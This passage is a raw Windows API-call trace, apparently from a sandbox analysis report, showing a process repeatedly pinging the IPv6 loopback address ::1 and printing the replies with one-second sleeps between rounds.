(HandlerRoutine=0x2417ca, Add=1) returned 1 [0118.644] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0118.645] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0118.646] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0118.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.646] LocalFree (hMem=0x4a51b8) returned 0x0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0118.646] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0118.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.646] LocalFree (hMem=0x4a29e8) returned 0x0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, 
dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0118.646] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0118.647] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.647] LocalFree (hMem=0x4a8f68) returned 0x0 [0118.647] Sleep (dwMilliseconds=0x3e8) [0119.848] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0119.932] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0119.932] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0119.932] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.932] LocalFree (hMem=0x4a51b8) returned 0x0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") 
returned 0x9 [0119.932] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0119.932] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.932] LocalFree (hMem=0x4a29e8) returned 0x0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0119.932] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0119.933] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.933] LocalFree (hMem=0x4a8f68) returned 0x0 [0119.933] Sleep (dwMilliseconds=0x3e8) [0125.839] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0126.149] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0126.149] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: 
lpszDst="Reply from ::1: ") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0126.149] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.149] LocalFree (hMem=0x4a51b8) returned 0x0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0126.149] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0126.149] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.149] LocalFree (hMem=0x4a29e8) returned 0x0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0126.149] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0126.150] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.150] LocalFree (hMem=0x4a8f68) returned 0x0 [0126.150] Sleep (dwMilliseconds=0x3e8) [0127.499] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0127.576] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, 
sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0127.577] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.577] LocalFree (hMem=0x4a51b8) returned 0x0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0127.577] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.577] LocalFree (hMem=0x4a29e8) returned 0x0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0127.577] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 
32768 [0127.577] LocalFree (hMem=0x4a8f68) returned 0x0 [0127.577] Sleep (dwMilliseconds=0x3e8) [0128.649] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0128.719] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0128.719] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0128.719] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0128.719] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.719] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a51b8) returned 0x0 [0128.720] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0128.720] CharToOemBuffA (in: lpszSrc="time=7ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time=7ms ") returned 1 [0128.720] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.720] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a29e8) returned 0x0 [0128.720] FormatMessageA (in: 
dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0128.720] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0128.720] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.720] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a8f68) returned 0x0 [0128.720] Sleep (dwMilliseconds=0x3e1) [0129.787] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0129.892] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0129.892] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0129.892] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0129.892] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.892] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0129.892] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.892] LocalFree (hMem=0x4a51b8) returned 0x0 [0129.892] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, 
Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0129.892] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0129.893] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.893] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0129.893] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.893] LocalFree (hMem=0x4a29e8) returned 0x0 [0129.893] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0129.893] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0129.893] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.893] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0129.893] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.893] LocalFree (hMem=0x4a8f68) returned 0x0 [0129.893] Sleep (dwMilliseconds=0x3e8) [0130.980] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0131.035] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0131.035] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0131.035] CharToOemBuffA (in: lpszSrc="Reply from ::1: 
", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0131.035] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.035] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0131.035] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.035] LocalFree (hMem=0x4a51b8) returned 0x0 [0131.035] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0131.035] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0131.036] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.036] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0131.036] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.036] LocalFree (hMem=0x4a29e8) returned 0x0 [0131.036] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0131.036] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0131.036] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.036] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0131.036] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.036] LocalFree (hMem=0x4a8f68) returned 0x0 [0131.036] Sleep (dwMilliseconds=0x3e8) [0132.173] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0132.344] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, 
sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0132.345] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0132.345] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a51b8) returned 0x0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0132.345] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0132.345] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a29e8) returned 0x0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0132.345] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0132.345] _setmode (_FileHandle=1, 
_Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a8f68) returned 0x0 [0132.345] Sleep (dwMilliseconds=0x3e8) [0133.469] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0133.670] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0133.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0133.671] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0133.671] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.671] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0133.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.671] LocalFree (hMem=0x4a51b8) returned 0x0 [0133.671] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0133.672] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0133.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.672] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0133.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.672] LocalFree (hMem=0x4a29e8) returned 0x0 
[0133.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0133.672] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0133.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.672] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0133.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.672] LocalFree (hMem=0x4a8f68) returned 0x0 [0133.672] Sleep (dwMilliseconds=0x3e8) [0134.731] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0134.804] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0134.804] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0134.804] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0134.804] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.804] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0134.808] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.808] LocalFree (hMem=0x4a51b8) returned 0x0 [0134.808] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, 
